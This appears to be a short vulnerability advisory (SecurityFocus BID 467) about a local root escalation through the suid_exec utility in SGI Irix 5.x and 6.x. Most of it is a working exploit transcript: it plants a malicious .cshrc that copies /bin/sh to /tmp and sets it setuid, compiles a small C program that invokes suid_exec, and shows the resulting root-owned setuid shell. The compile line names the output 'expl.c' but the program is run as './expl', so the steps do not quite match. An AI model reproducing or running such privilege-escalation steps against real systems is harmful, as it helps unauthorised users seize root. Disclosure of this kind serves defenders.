source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
源链接

Hacking more

...